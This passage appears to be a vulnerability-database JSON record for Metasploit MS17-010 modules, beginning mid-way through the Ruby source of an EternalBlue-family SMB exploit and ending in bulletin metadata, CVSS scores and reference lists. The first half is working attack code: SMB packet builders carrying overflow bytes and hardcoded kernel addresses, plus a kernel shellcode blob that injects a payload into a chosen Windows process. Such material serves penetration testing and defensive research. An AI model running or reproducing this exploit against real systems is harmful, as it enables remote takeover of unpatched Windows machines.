''\n\n # padding\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x1c\n pkt << \"\\x03\\x00\\x00\\x00\"\n pkt << \"\\x00\" * 0x74\n\n # KI_USER_SHARED_DATA addresses\n pkt << \"\\xb0\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\" * 2 # x64 address\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xc0\\xf0\\xdf\\xff\" * 2 # x86 address\n pkt << \"\\x00\" * 0xc4\n\n # payload addreses\n pkt << \"\\x90\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x4\n pkt << \"\\xf0\\xf1\\xdf\\xff\"\n pkt << \"\\x00\" * 0x40\n\n pkt << \"\\xf0\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x00\\x02\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\"\n\n pkt << kernel_user_payload\n\n # fill out the rest, this can be randomly generated\n pkt << \"\\x00\" * (pkt_max_payload - kernel_user_payload.length)\n\n pkt\n end\n\n # Type can be :eb_trans2_zero, :eb_trans2_buffer, or :eb_trans2_exploit\n def make_smb1_trans2_exploit_packet(tree_id, user_id, type, timeout)\n timeout = (timeout * 0x10) + 3\n timeout_value = \"\\x35\\x00\\xd0\" + timeout.chr\n\n packet = RubySMB::SMB1::Packet::Trans2::Request.new\n packet = set_smb1_headers(packet, tree_id, user_id)\n\n # The packets are labeled as Secondary Requests but are actually structured\n # as normal Trans2 Requests for some reason. We shall similarly cheat here.\n packet.smb_header.command = RubySMB::SMB1::Commands::SMB_COM_TRANSACTION2_SECONDARY\n\n packet.parameter_block.flags.read(\"\\x00\\x10\")\n packet.parameter_block.timeout.read(timeout_value)\n\n packet.parameter_block.word_count = 9\n packet.parameter_block.total_data_count = 4096\n packet.parameter_block.parameter_count = 4096\n\n nbss = \"\\x00\\x00\\x10\\x35\"\n pkt = packet.to_binary_s\n pkt = pkt[0, packet.parameter_block.parameter_offset.abs_offset]\n pkt = nbss + pkt\n\n case type\n when :eb_trans2_exploit\n vprint_status('Making :eb_trans2_exploit packet')\n\n pkt << \"\\x41\" * 2957\n\n pkt << \"\\x80\\x00\\xa8\\x00\" # overflow\n\n pkt << \"\\x00\" * 0x10\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x6\n pkt << \"\\xff\\xff\"\n pkt << \"\\x00\" * 0x16\n\n pkt << \"\\x00\\xf1\\xdf\\xff\" # x86 addresses\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x20\\xf0\\xdf\\xff\"\n\n pkt << \"\\x00\\xf1\\xdf\\xff\\xff\\xff\\xff\\xff\" # x64\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 4\n\n pkt << \"\\x80\\xef\\xdf\\xff\"\n\n pkt << \"\\x00\" * 4\n pkt << \"\\x10\\x00\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x18\\x01\\xd0\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x10\n\n pkt << \"\\x60\\x00\\x04\\x10\"\n pkt << \"\\x00\" * 0xc\n pkt << \"\\x90\\xff\\xcf\\xff\\xff\\xff\\xff\\xff\"\n pkt << \"\\x00\" * 0x8\n pkt << \"\\x80\\x10\"\n pkt << \"\\x00\" * 0xe\n pkt << \"\\x39\"\n pkt << \"\\xbb\"\n\n pkt << \"\\x41\" * 965\n when :eb_trans2_zero\n vprint_status('Making :eb_trans2_zero packet')\n pkt << \"\\x00\" * 2055\n pkt << \"\\x83\\xf3\"\n pkt << \"\\x41\" * 2039\n else\n vprint_status('Making :eb_trans2_buffer packet')\n pkt << \"\\x41\" * 4096\n end\n pkt\n end\n\n def make_smb1_nt_trans_packet(tree_id, user_id)\n packet = RubySMB::SMB1::Packet::NtTrans::Request.new\n\n # Disable the automatic padding because it will distort\n # our values here.\n packet.data_block.enable_padding = false\n\n packet = set_smb1_headers(packet, tree_id, user_id)\n\n packet.parameter_block.max_setup_count = 1\n packet.parameter_block.total_parameter_count = 30\n packet.parameter_block.total_data_count = 66512\n packet.parameter_block.max_parameter_count = 30\n packet.parameter_block.max_data_count = 0\n packet.parameter_block.parameter_count = 30\n packet.parameter_block.parameter_offset = 75\n packet.parameter_block.data_count = 976\n packet.parameter_block.data_offset = 104\n packet.parameter_block.function = 0\n\n packet.parameter_block.setup << 0x0000\n\n packet.data_block.byte_count = 1004\n packet.data_block.trans2_parameters = \"\\x00\" * 31 + \"\\x01\" + (\"\\x00\" * 973)\n packet\n end\n\n def make_smb1_free_hole_session_packet(flags2, vcnum, native_os)\n packet = RubySMB::SMB1::Packet::SessionSetupRequest.new\n\n packet.smb_header.flags.read(\"\\x18\")\n packet.smb_header.flags2.read(flags2)\n packet.smb_header.pid_high = 65279\n packet.smb_header.mid = 64\n\n packet.parameter_block.vc_number.read(vcnum)\n packet.parameter_block.max_buffer_size = 4356\n packet.parameter_block.max_mpx_count = 10\n packet.parameter_block.security_blob_length = 0\n\n packet.data_block.native_os = native_os\n packet.data_block.native_lan_man = \"\\x00\" * 17\n packet\n end\n\n # ring3 = user mode encoded payload\n # proc_name = process to inject APC into\n # ep_thl_b = EPROCESS.ThreadListHead.Blink offset\n # et_alertable = ETHREAD.Alertable offset\n # teb_acp = TEB.ActivationContextPointer offset\n # et_tle = ETHREAD.ThreadListEntry offset\n def make_kernel_user_payload(ring3, proc_name, _ep_thl_b, _et_alertable, _teb_acp, _et_tle)\n sc = make_kernel_shellcode(proc_name)\n sc << [ring3.length].pack('S<')\n sc << ring3\n sc\n end\n\n def generate_process_hash(process)\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n proc_hash = 0\n process << \"\\x00\"\n process.each_byte do |c|\n proc_hash = ror(proc_hash, 13)\n proc_hash += c\n end\n [proc_hash].pack('l<')\n end\n\n def ror(dword, bits)\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\n end\n\n def make_kernel_shellcode(proc_name)\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\n # Length: 1019 bytes\n\n # \"\\xcc\"+\n \"\\x31\\xC9\\x41\\xE2\\x01\\xC3\\xB9\\x82\\x00\\x00\\xC0\\x0F\\x32\\x48\\xBB\\xF8\" \\\n \"\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x89\\x53\\x04\\x89\\x03\\x48\\x8D\\x05\\x0A\" \\\n \"\\x00\\x00\\x00\\x48\\x89\\xC2\\x48\\xC1\\xEA\\x20\\x0F\\x30\\xC3\\x0F\\x01\\xF8\" \\\n \"\\x65\\x48\\x89\\x24\\x25\\x10\\x00\\x00\\x00\\x65\\x48\\x8B\\x24\\x25\\xA8\\x01\" \\\n \"\\x00\\x00\\x50\\x53\\x51\\x52\\x56\\x57\\x55\\x41\\x50\\x41\\x51\\x41\\x52\\x41\" \\\n \"\\x53\\x41\\x54\\x41\\x55\\x41\\x56\\x41\\x57\\x6A\\x2B\\x65\\xFF\\x34\\x25\\x10\" \\\n \"\\x00\\x00\\x00\\x41\\x53\\x6A\\x33\\x51\\x4C\\x89\\xD1\\x48\\x83\\xEC\\x08\\x55\" \\\n \"\\x48\\x81\\xEC\\x58\\x01\\x00\\x00\\x48\\x8D\\xAC\\x24\\x80\\x00\\x00\\x00\\x48\" \\\n \"\\x89\\x9D\\xC0\\x00\\x00\\x00\\x48\\x89\\xBD\\xC8\\x00\\x00\\x00\\x48\\x89\\xB5\" \\\n \"\\xD0\\x00\\x00\\x00\\x48\\xA1\\xF8\\x0F\\xD0\\xFF\\xFF\\xFF\\xFF\\xFF\\x48\\x89\" \\\n \"\\xC2\\x48\\xC1\\xEA\\x20\\x48\\x31\\xDB\\xFF\\xCB\\x48\\x21\\xD8\\xB9\\x82\\x00\" \\\n \"\\x00\\xC0\\x0F\\x30\\xFB\\xE8\\x38\\x00\\x00\\x00\\xFA\\x65\\x48\\x8B\\x24\\x25\" \\\n \"\\xA8\\x01\\x00\\x00\\x48\\x83\\xEC\\x78\\x41\\x5F\\x41\\x5E\\x41\\x5D\\x41\\x5C\" \\\n \"\\x41\\x5B\\x41\\x5A\\x41\\x59\\x41\\x58\\x5D\\x5F\\x5E\\x5A\\x59\\x5B\\x58\\x65\" \\\n \"\\x48\\x8B\\x24\\x25\\x10\\x00\\x00\\x00\\x0F\\x01\\xF8\\xFF\\x24\\x25\\xF8\\x0F\" \\\n \"\\xD0\\xFF\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\\x55\\x48\\x89\\xE5\" \\\n \"\\x66\\x83\\xE4\\xF0\\x48\\x83\\xEC\\x20\\x4C\\x8D\\x35\\xE3\\xFF\\xFF\\xFF\\x65\" \\\n \"\\x4C\\x8B\\x3C\\x25\\x38\\x00\\x00\\x00\\x4D\\x8B\\x7F\\x04\\x49\\xC1\\xEF\\x0C\" \\\n \"\\x49\\xC1\\xE7\\x0C\\x49\\x81\\xEF\\x00\\x10\\x00\\x00\\x49\\x8B\\x37\\x66\\x81\" \\\n \"\\xFE\\x4D\\x5A\\x75\\xEF\\x41\\xBB\\x5C\\x72\\x11\\x62\\xE8\\x18\\x02\\x00\\x00\" \\\n \"\\x48\\x89\\xC6\\x48\\x81\\xC6\\x08\\x03\\x00\\x00\\x41\\xBB\\x7A\\xBA\\xA3\\x30\" \\\n \"\\xE8\\x03\\x02\\x00\\x00\\x48\\x89\\xF1\\x48\\x39\\xF0\\x77\\x11\\x48\\x8D\\x90\" \\\n \"\\x00\\x05\\x00\\x00\\x48\\x39\\xF2\\x72\\x05\\x48\\x29\\xC6\\xEB\\x08\\x48\\x8B\" \\\n \"\\x36\\x48\\x39\\xCE\\x75\\xE2\\x49\\x89\\xF4\\x31\\xDB\\x89\\xD9\\x83\\xC1\\x04\" \\\n \"\\x81\\xF9\\x00\\x00\\x01\\x00\\x0F\\x8D\\x66\\x01\\x00\\x00\\x4C\\x89\\xF2\\x89\" \\\n \"\\xCB\\x41\\xBB\\x66\\x55\\xA2\\x4B\\xE8\\xBC\\x01\\x00\\x00\\x85\\xC0\\x75\\xDB\" \\\n \"\\x49\\x8B\\x0E\\x41\\xBB\\xA3\\x6F\\x72\\x2D\\xE8\\xAA\\x01\\x00\\x00\\x48\\x89\" \\\n \"\\xC6\\xE8\\x50\\x01\\x00\\x00\\x41\\x81\\xF9\" + generate_process_hash(proc_name.upcase) + \"\\x75\\xBC\\x49\" \\\n \"\\x8B\\x1E\\x4D\\x8D\\x6E\\x10\\x4C\\x89\\xEA\\x48\\x89\\xD9\\x41\\xBB\\xE5\\x24\" \\\n \"\\x11\\xDC\\xE8\\x81\\x01\\x00\\x00\\x6A\\x40\\x68\\x00\\x10\\x00\\x00\\x4D\\x8D\" \\\n \"\\x4E\\x08\\x49\\xC7\\x01\\x00\\x10\\x00\\x00\\x4D\\x31\\xC0\\x4C\\x89\\xF2\\x31\" \\\n \"\\xC9\\x48\\x89\\x0A\\x48\\xF7\\xD1\\x41\\xBB\\x4B\\xCA\\x0A\\xEE\\x48\\x83\\xEC\" \\\n \"\\x20\\xE8\\x52\\x01\\x00\\x00\\x85\\xC0\\x0F\\x85\\xC8\\x00\\x00\\x00\\x49\\x8B\" \\\n \"\\x3E\\x48\\x8D\\x35\\xE9\\x00\\x00\\x00\\x31\\xC9\\x66\\x03\\x0D\\xD7\\x01\\x00\" \\\n \"\\x00\\x66\\x81\\xC1\\xF9\\x00\\xF3\\xA4\\x48\\x89\\xDE\\x48\\x81\\xC6\\x08\\x03\" \\\n \"\\x00\\x00\\x48\\x89\\xF1\\x48\\x8B\\x11\\x4C\\x29\\xE2\\x51\\x52\\x48\\x89\\xD1\" \\\n \"\\x48\\x83\\xEC\\x20\\x41\\xBB\\x26\\x40\\x36\\x9D\\xE8\\x09\\x01\\x00\\x00\\x48\" \\\n \"\\x83\\xC4\\x20\\x5A\\x59\\x48\\x85\\xC0\\x74\\x18\\x48\\x8B\\x80\\xC8\\x02\\x00\" \\\n \"\\x00\\x48\\x85\\xC0\\x74\\x0C\\x48\\x83\\xC2\\x4C\\x8B\\x02\\x0F\\xBA\\xE0\\x05\" \\\n \"\\x72\\x05\\x48\\x8B\\x09\\xEB\\xBE\\x48\\x83\\xEA\\x4C\\x49\\x89\\xD4\\x31\\xD2\" \\\n \"\\x80\\xC2\\x90\\x31\\xC9\\x41\\xBB\\x26\\xAC\\x50\\x91\\xE8\\xC8\\x00\\x00\\x00\" \\\n \"\\x48\\x89\\xC1\\x4C\\x8D\\x89\\x80\\x00\\x00\\x00\\x41\\xC6\\x01\\xC3\\x4C\\x89\" \\\n \"\\xE2\\x49\\x89\\xC4\\x4D\\x31\\xC0\\x41\\x50\\x6A\\x01\\x49\\x8B\\x06\\x50\\x41\" \\\n \"\\x50\\x48\\x83\\xEC\\x20\\x41\\xBB\\xAC\\xCE\\x55\\x4B\\xE8\\x98\\x00\\x00\\x00\" \\\n \"\\x31\\xD2\\x52\\x52\\x41\\x58\\x41\\x59\\x4C\\x89\\xE1\\x41\\xBB\\x18\\x38\\x09\" \\\n \"\\x9E\\xE8\\x82\\x00\\x00\\x00\\x4C\\x89\\xE9\\x41\\xBB\\x22\\xB7\\xB3\\x7D\\xE8\" \\\n \"\\x74\\x00\\x00\\x00\\x48\\x89\\xD9\\x41\\xBB\\x0D\\xE2\\x4D\\x85\\xE8\\x66\\x00\" \\\n \"\\x00\\x00\\x48\\x89\\xEC\\x5D\\x5B\\x41\\x5C\\x41\\x5D\\x41\\x5E\\x41\\x5F\\x5E\" \\\n \"\\xC3\\xE9\\xB5\\x00\\x00\\x00\\x4D\\x31\\xC9\\x31\\xC0\\xAC\\x41\\xC1\\xC9\\x0D\" \\\n \"\\x3C\\x61\\x7C\\x02\\x2C\\x20\\x41\\x01\\xC1\\x38\\xE0\\x75\\xEC\\xC3\\x31\\xD2\" \\\n \"\\x65\\x48\\x8B\\x52\\x60\\x48\\x8B\\x52\\x18\\x48\\x8B\\x52\\x20\\x48\\x8B\\x12\" \\\n \"\\x48\\x8B\\x72\\x50\\x48\\x0F\\xB7\\x4A\\x4A\\x45\\x31\\xC9\\x31\\xC0\\xAC\\x3C\" \\\n \"\\x61\\x7C\\x02\\x2C\\x20\\x41\\xC1\\xC9\\x0D\\x41\\x01\\xC1\\xE2\\xEE\\x45\\x39\" \\\n \"\\xD9\\x75\\xDA\\x4C\\x8B\\x7A\\x20\\xC3\\x4C\\x89\\xF8\\x41\\x51\\x41\\x50\\x52\" \\\n \"\\x51\\x56\\x48\\x89\\xC2\\x8B\\x42\\x3C\\x48\\x01\\xD0\\x8B\\x80\\x88\\x00\\x00\" \\\n \"\\x00\\x48\\x01\\xD0\\x50\\x8B\\x48\\x18\\x44\\x8B\\x40\\x20\\x49\\x01\\xD0\\x48\" \\\n \"\\xFF\\xC9\\x41\\x8B\\x34\\x88\\x48\\x01\\xD6\\xE8\\x78\\xFF\\xFF\\xFF\\x45\\x39\" \\\n \"\\xD9\\x75\\xEC\\x58\\x44\\x8B\\x40\\x24\\x49\\x01\\xD0\\x66\\x41\\x8B\\x0C\\x48\" \\\n \"\\x44\\x8B\\x40\\x1C\\x49\\x01\\xD0\\x41\\x8B\\x04\\x88\\x48\\x01\\xD0\\x5E\\x59\" \\\n \"\\x5A\\x41\\x58\\x41\\x59\\x41\\x5B\\x41\\x53\\xFF\\xE0\\x56\\x41\\x57\\x55\\x48\" \\\n \"\\x89\\xE5\\x48\\x83\\xEC\\x20\\x41\\xBB\\xDA\\x16\\xAF\\x92\\xE8\\x4D\\xFF\\xFF\" \\\n \"\\xFF\\x31\\xC9\\x51\\x51\\x51\\x51\\x41\\x59\\x4C\\x8D\\x05\\x1A\\x00\\x00\\x00\" \\\n \"\\x5A\\x48\\x83\\xEC\\x20\\x41\\xBB\\x46\\x45\\x1B\\x22\\xE8\\x68\\xFF\\xFF\\xFF\" \\\n \"\\x48\\x89\\xEC\\x5D\\x41\\x5F\\x5E\\xC3\" # \\x01\\x00\\xC3\"\n end\n\n # Sets common SMB1 Header values used by the various\n # packets in the exploit.\n #\n # @return [RubySMB::GenericPacket] the modified version of the packet\n def set_smb1_headers(packet, tree_id, user_id)\n packet.smb_header.flags2.read(\"\\x07\\xc0\")\n packet.smb_header.tid = tree_id\n packet.smb_header.uid = user_id\n packet.smb_header.pid_low = 65279\n packet.smb_header.mid = 64\n packet\n end\n\n # Returns the value to be passed to SMB clients for\n # the password. If the user has not supplied a password\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the password value\n def smb_pass\n if datastore['SMBPass'].present?\n datastore['SMBPass']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the username. If the user has not supplied a username\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the username value\n def smb_user\n if datastore['SMBUser'].present?\n datastore['SMBUser']\n else\n ''\n end\n end\n\n # Returns the value to be passed to SMB clients for\n # the domain. If the user has not supplied a domain\n # it returns an empty string to trigger an anonymous\n # logon.\n #\n # @return [String] the domain value\n def smb_domain\n if datastore['SMBDomain'].present?\n datastore['SMBDomain']\n else\n ''\n end\n end\nend\n", "metasploitReliability": "", "metasploitHistory": "", "_object_type": "robots.models.metasploit.MetasploitBulletin", "_object_types": ["robots.models.metasploit.MetasploitBulletin", "robots.models.base.Bulletin"], "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "edition": 2, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "142f691ada068c40ae71fdd0eac8502e"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "e399617d745f01fecac811333e03113c"}, {"key": "href", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "immutableFields", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "e80bef8ab7c34172a2f61c17200cdbec"}, {"key": "published", "hash": "e2dd14eb78ca67b48750e2bf14c1af6d"}, {"key": "references", "hash": "f1292e4e1bddcf376f3f8330160fdd6b"}, {"key": "reporter", "hash": "74798933f90c8c8a3dcac277d7c31e76"}, {"key": "title", "hash": "f01bc7580a1d9e48a4a0685bbba5abb4"}, {"key": "type", "hash": "6719951e37a5b7c4b959f8df50c9d641"}], "scheme": null}, {"id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "hash": "c8ab002a12aee6650518c6d0b37dc53dbf6c0456b6e6dfcdcb8f2dbbcb24fb02", "type": "metasploit", "bulletinFamily": "exploit", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "published": "2018-01-29T01:13:25", "modified": "2020-10-02T20:00:37", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "", "reporter": "Rapid7", "references": ["https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/"], "cvelist": ["CVE-2017-0143", "CVE-2017-0146", "CVE-2017-0147"], "lastseen": "2020-10-13T19:19:22", "history": [{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "edition": 1, "enchantments": {"dependencies": {"modified": "2020-10-13T19:19:22", "references": [{"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "type": "cve"}, {"idList": ["SMNTC-96709", "SMNTC-96707", "SMNTC-96703"], "type": "symantec"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"], "type": "ics"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["KB4013389"], "type": "mskb"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:F12E2167FDA829ED32C7A16A83B048BF"], "type": "thn"}, {"idList": ["MS:CVE-2017-0146", "MS:CVE-2017-0143", "MS:CVE-2017-0147"], "type": "mscve"}, {"idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"], "type": "metasploit"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:7E6831E46F8BB1882B752045F527ABE6"], "type": "trendmicroblog"}, {"idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": "openvas"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:2D677AA07C3BC24D8037E937830ACA0D", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:8F97D6443E5FED252FF64CE37A74709D"], "type": "saint"}, {"idList": ["KLA11902", "KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2", "QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"], "type": "qualysblog"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2020-10-13T19:19:22", "rev": 2, "value": 7.3, "vector": "NONE"}}, "hash": "8b4dacc9986d48181592f07e3d4c459fe41bb14f2a381862248fffd6862e127c", "hashmap": [{"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "immutableFields"}, {"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "href"}, {"hash": "d726e774add6189e33cf2ea0c61a2ba5", "key": "cvss"}, {"hash": "7bf92dcded785b5598f61cda83fdc26f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss3"}, {"hash": "74798933f90c8c8a3dcac277d7c31e76", "key": "reporter"}, {"hash": "7bc839b0566b34ac03da233f997066ff", "key": "references"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvss2"}, {"hash": "e80bef8ab7c34172a2f61c17200cdbec", "key": "modified"}, {"hash": "6719951e37a5b7c4b959f8df50c9d641", "key": "type"}, {"hash": "b1b79302e85cd03f0ea3818121409a3e", "key": "published"}, {"hash": "0762dab7827371d2474b2f3149cd5d38", "key": "description"}, {"hash": "e6f53676ca888a6a837a24417efa2477", "key": "cvelist"}], "history": [], "href": "", "id": "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "immutableFields": [], "lastseen": "2020-10-13T19:19:22", "modified": "2020-10-02T20:00:37", "objectVersion": "1.5", "published": "2018-01-29T01:13:25", "references": ["https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0147", "https://github.com/worawit/MS17-010", "https://hitcon.org/2017/CMT/slide-files/d2_s2_r0.pdf", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143", "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0146"], "reporter": "Rapid7", "title": "MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution", "type": "metasploit", "viewCount": 461}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2020-10-13T19:19:22"}, {"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "This module will exploit SMB with vulnerabilities in MS17-010 to achieve a write-what-where primitive. This will then be used to overwrite the connection session information with as an Administrator session. From there, the normal psexec command execution is done. Exploits a type confusion between Transaction and WriteAndX requests and a race condition in Transaction requests, as seen in the EternalRomance, EternalChampion, and EternalSynergy exploits. This exploit chain is more reliable than the EternalBlue exploit, but requires a named pipe.\n", "enchantments": {"dependencies": {"modified": "2020-03-07T20:36:20", "references": [{"idList": ["KLA10977", "KLA10979"], "type": "kaspersky"}, {"idList": ["ICSMA-18-058-02"], "type": "ics"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 